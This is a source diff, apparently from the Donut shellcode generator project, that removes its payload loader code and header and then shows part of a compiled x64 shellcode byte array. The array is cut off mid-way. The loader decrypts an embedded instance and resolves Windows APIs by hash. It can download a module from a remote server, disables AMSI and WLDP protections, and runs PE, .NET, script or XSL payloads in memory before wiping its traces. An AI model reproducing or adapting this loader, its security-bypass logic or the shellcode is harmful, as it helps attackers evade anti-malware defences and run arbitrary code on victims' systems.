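-pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
-if(pv == NULL) {
-DPRINT("Memory allocation failed...");
-return -1;
-}
-DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
-Memcpy(pv, lpParameter, inst->len);
-inst = (PDONUT_INSTANCE)pv;
-
-DPRINT("Zero initializing PDONUT_ASSEMBLY");
-Memset(&assembly, 0, sizeof(assembly));
-
-#if !defined(NOCRYPTO)
-PBYTE inst_data;
-// load pointer to data just past len + key
-inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
-
-DPRINT("Decrypting %li bytes of instance", inst->len);
-
-donut_decrypt(inst->key.mk,
-inst->key.ctr,
-inst_data,
-inst->len - offsetof(DONUT_INSTANCE, api_cnt));
-
-DPRINT("Generating hash to verify decryption");
-ULONG64 mac = maru(inst->sig, inst->iv);
-DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac);
-
-if(mac != inst->mac) {
-DPRINT("Decryption of instance failed");
-goto erase_memory;
-}
-#endif
-DPRINT("Resolving LoadLibraryA");
-
-inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
-if(inst->api.addr[0] == NULL) return -1;
-
-for(i=0; i<inst->dll_cnt; i++) {
-DPRINT("Loading %s ...", inst->dll_name[i]);
-inst->api.LoadLibraryA(inst->dll_name[i]);
-}
-
-DPRINT("Resolving %i API", inst->api_cnt);
-
-for(i=1; i<inst->api_cnt; i++) {
-DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
-
-inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
-
-if(inst->api.addr[i] == NULL) {
-DPRINT("Failed to resolve API");
-goto erase_memory;
-}
-}
-
-if(inst->type == DONUT_INSTANCE_URL) {
-DPRINT("Instance is URL");
-if(!DownloadModule(inst)) goto erase_memory;
-}
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-// try bypassing AMSI and WLDP?
-if(inst->bypass != DONUT_BYPASS_SKIP) {
-// Try to disable AMSI
-disabled = DisableAMSI(inst);
-DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
-if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
-goto erase_memory;
-
-// Try to disable WLDP
-disabled = DisableWLDP(inst);
-DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
-if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
-goto erase_memory;
-}
-
-// unmanaged EXE/DLL?
-if(mod->type == DONUT_MODULE_DLL ||
-mod->type == DONUT_MODULE_EXE) {
-RunPE(inst);
-} else
-// .NET EXE/DLL?
-if(mod->type == DONUT_MODULE_NET_DLL ||
-mod->type == DONUT_MODULE_NET_EXE)
-{
-if(LoadAssembly(inst, &assembly)) {
-RunAssembly(inst, &assembly);
-}
-FreeAssembly(inst, &assembly);
-} else
-// vbs or js?
-if(mod->type == DONUT_MODULE_VBS ||
-mod->type == DONUT_MODULE_JS)
-{
-RunScript(inst);
-} else
-// xsl?
-if(mod->type == DONUT_MODULE_XSL) {
-RunXSL(inst);
-}
-
-erase_memory:
-// if module was downloaded
-if(inst->type == DONUT_INSTANCE_URL) {
-if(inst->module.p != NULL) {
-// overwrite memory with zeros
-Memset(inst->module.p, 0, (DWORD)inst->mod_len);
-
-// free memory
-inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
-inst->module.p = NULL;
-}
-}
-
-DPRINT("Erasing RW memory for instance");
-Memset(inst, 0, inst->len);
-
-DPRINT("Releasing RW memory for instance");
-_VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
-
-return 0;
-}
-
-#include "http_client.c" // For downloading module
-
-#include "inmem_dotnet.c" // .NET assemblies
-#include "inmem_pe.c" // Unmanaged PE/DLL files
-#include "inmem_xsl.c" // XSL files
-#include "inmem_script.c" // VBS/JS files
-
-#include "peb.c" // resolve functions in export table
-
-#include "bypass.c" // Bypass AMSI and WLDP
-#include "getpc.c" // code stub to return program counter (always at the end!)
-
-// the following code is *only* for development purposes
-// given an instance file, it will run as if running on a target system
-// attach a debugger to host process
-#ifdef DEBUG
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <sys/stat.h>
-
-int main(int argc, char *argv[]) {
-FILE *fd;
-struct stat fs;
-PDONUT_INSTANCE inst;
-DWORD old;
-
-if(argc != 2) {
-printf(" [ usage: payload <instance>\n");
-return 0;
-}
-// get size of instance
-if(stat(argv[1], &fs) != 0) {
-printf(" [ unable to obtain size of instance.\n");
-return 0;
-}
-
-// zero size?
-if(fs.st_size == 0) {
-printf(" [ invalid instance.\n");
-return 0;
-}
-
-// try open for reading
-fd = fopen(argv[1], "rb");
-if(fd == NULL) {
-printf(" [ unable to open %s.\n", argv[1]);
-return 0;
-}
-
-// allocate memory
-inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
-if(inst != NULL) {
-fread(inst, 1, fs.st_size, fd);
-
-// change protection to PAGE_EXECUTE_READ
-if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
-printf("Running...");
-
-// run payload with instance
-ThreadProc(inst);
-}
-// deallocate
-VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
-}
-fclose(fd);
-return 0;
-}
-#endif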
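--- a/payload/payload.h
+++ b/payload/payload.h
@@ -1,145 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef PAYLOAD_H
-#define PAYLOAD_H
-
-#if !defined(_MSC_VER)
-#define __out_ecount_full(x)
-#define __out_ecount_full_opt(x)
-#include <inttypes.h>
-#endif
-
-#include <windows.h>
-#include <wincrypt.h>
-#include <oleauto.h>
-#include <objbase.h>
-#include <wininet.h>
-
-#pragma comment(lib, "wininet.lib")
-#pragma comment(lib, "advapi32.lib")
-#pragma comment(lib, "crypt32.lib")
-
-#if defined(DEBUG)
-#include <stdio.h>
-#include <string.h>
-
-#define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
-
-#define DPRINT(...) { \
-fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
-fprintf(stderr, __VA_ARGS__); \
-}
-#else
-#define DPRINT(...) // Don't do anything in release builds
-#endif
-
-#define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
-(__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
-(__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
-
-// Relative Virtual Address to Virtual Address
-#define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
-
-#if defined(_M_IX86) || defined(__i386__)
-// return pointer to code in memory
-char *get_pc(void);
-
-// PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
-#define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
-#else
-#define ADR(type, addr) (type)(addr) // do nothing on 64-bit
-#endif
-
-void *Memset(void *ptr, int value, size_t num);
-void *Memcpy(void *destination, const void *source, size_t num);
-int Memcmp(const void *ptr1, const void *ptr2, size_t num);
-
-#if !defined(_MSC_VER)
-#define memcmp(x,y,z) Memcmp(x,y,z)
-#endif
-
-#include "peb.h" // Process Environment Block
-#include "winapi.h" // Prototypes
-#include "clr.h" // Common Language Runtime Interface
-
-#include "donut.h"
-
-#include "amsi.h" // Anti-malware Scan Interface
-#include "activescript.h" // Interfaces for executing VBS/JS files
-#include "wscript.h" // Interfaces to support WScript object
-
-typedef struct {
-IActiveScriptSite site;
-IActiveScriptSiteWindow siteWnd;
-IHost wscript;
-HANDLE hEvent;
-PDONUT_INSTANCE inst; //
-} MyIActiveScriptSite;
-
-// internal structure
-typedef struct _DONUT_ASSEMBLY {
-ICLRMetaHost *icmh;
-ICLRRuntimeInfo *icri;
-ICorRuntimeHost *icrh;
-IUnknown *iu;
-AppDomain *ad;
-Assembly *as;
-Type *type;
-MethodInfo *mi;
-} DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
-
-// Downloads a module from remote HTTP server into memory
-BOOL DownloadModule(PDONUT_INSTANCE);
-
-// .NET DLL/EXE
-BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
-BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
-VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
-
-// Extensible Stylesheet Language Transformations
-VOID RunXSL(PDONUT_INSTANCE);
-
-// In-Memory execution of native DLL
-VOID RunPE(PDONUT_INSTANCE);
-
-// VBS / JS files
-VOID RunScript(PDONUT_INSTANCE);
-
-// Disables Antimalware Scan Interface
-BOOL DisableAMSI(PDONUT_INSTANCE);
-
-// Disables Windows Lockdown Policy
-BOOL DisableWLDP(PDONUT_INSTANCE);
-
-LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
-
-#endif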
+0
-1361
payload/payload_exe_x64.h
0
1 unsigned char PAYLOAD_EXE_X64[] = {
2 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48,
3 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48,
4 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48,
5 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48,
6 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34,
7 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
8 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
9 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89,
10 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45,
11 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0,
12 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00,
13 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
14 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00,
15 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8,
16 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff,
17 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89,
18 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10,
19 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8,
20 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41,
21 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
22 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05,
23 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8,
24 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48,
25 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48,
26 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
27 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45,
28 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a,
29 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00,
30 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18,
31 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00,
32 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45,
33 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8,
34 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
35 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48,
36 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
37 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
38 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b,
39 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00,
40 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08,
41 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
42 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7,
43 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45,
44 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
45 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8,
46 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48,
47 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2,
48 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
49 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f,
50 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
51 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d,
52 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8,
53 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10,
54 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48,
55 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
56 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
57 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
58 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
59 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50,
60 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00,
61 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45,
62 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
63 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
64 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75,
65 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83,
66 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
67 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b,
68 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89,
69 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48,
70 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b,
71 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95,
72 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
73 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70,
74 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c,
75 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b,
76 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a,
77 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48,
78 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b,
79 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26,
80 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48,
81 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb,
82 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb,
83 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00,
84 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80,
85 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45,
86 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b,
87 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0,
88 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00,
89 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55,
90 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0,
91 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45,
92 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
93 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8,
94 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
95 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0,
96 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff,
97 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00,
98 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48,
99 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02,
100 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
101 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85,
102 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02,
103 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00,
104 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
105 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01,
106 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00,
107 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0,
108 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00,
109 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00,
110 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
111 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00,
112 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01,
113 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba,
114 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00,
115 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01,
116 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89,
117 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00,
118 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00,
119 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00,
120 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
121 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00,
122 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
123 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00,
124 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00,
125 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8,
126 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08,
127 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00,
128 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
129 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
130 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
131 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
132 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
133 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00,
134 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
135 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
136 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c,
137 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7,
138 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00,
139 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
140 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
141 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89,
142 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00,
143 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00,
144 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00,
145 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00,
